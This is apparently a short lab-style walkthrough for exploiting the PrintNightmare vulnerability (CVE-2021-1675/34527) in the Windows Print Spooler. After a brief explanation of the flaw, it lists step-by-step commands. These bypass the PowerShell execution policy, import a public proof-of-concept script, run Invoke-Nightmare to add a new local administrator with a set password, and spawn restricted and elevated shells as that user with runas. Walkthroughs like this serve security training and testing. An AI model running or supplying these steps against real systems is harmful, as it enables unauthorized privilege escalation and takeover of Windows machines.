CVE-2021-1675/34527 PrintNightmare

0 - Overview

Print Spooler is a Windows service that manages print jobs sent to a printer. It queues print requests and sends them to the printer when ready.

PrintNightmare (CVE-2021-1675/CVE-2021-34527) is a vulnerability in the RpcAddPrinterDriver function of Print Spooler, which is used for adding printer drivers. Normally, only users with SeLoadDriverPrivilege should be able to do this.

The flaw allows an attacker to exploit this function to run arbitrary code with elevated privileges, even if they don't have SeLoadDriverPrivilege.

1 - Check Spooler Service

First we make sure the Spooler is running:

PS C:\hacker> ls \\localhost\pipe\spoolss


    Directory: \\localhost\pipe


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
                                                  spoolss

If the service isn't running we get a "path does not exist" error.

2 - Adding Local Admin

We will create a new Administrator using this PowerShell implementation.

First we must bypass the execution policy:

Set-ExecutionPolicy Bypass -Scope Process

Then import the Powershell POC

Import-Module .\CVE-2021-1675.ps1

Finally create the new admin:

Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

We can check our user was created:

net user hacker

3 - Spawn a shell for the newly created user

We use runas to spawn a powershell terminal for the new user.

This will spawn a restricted (UAC) shell:

runas /user:hacker "powershell"

This will spawn an unrestricted shell:

runas /savecred /user:hacker "powershell -Command Start-Process PowerShell -Verb RunAs"

Both will prompt for the password after some time.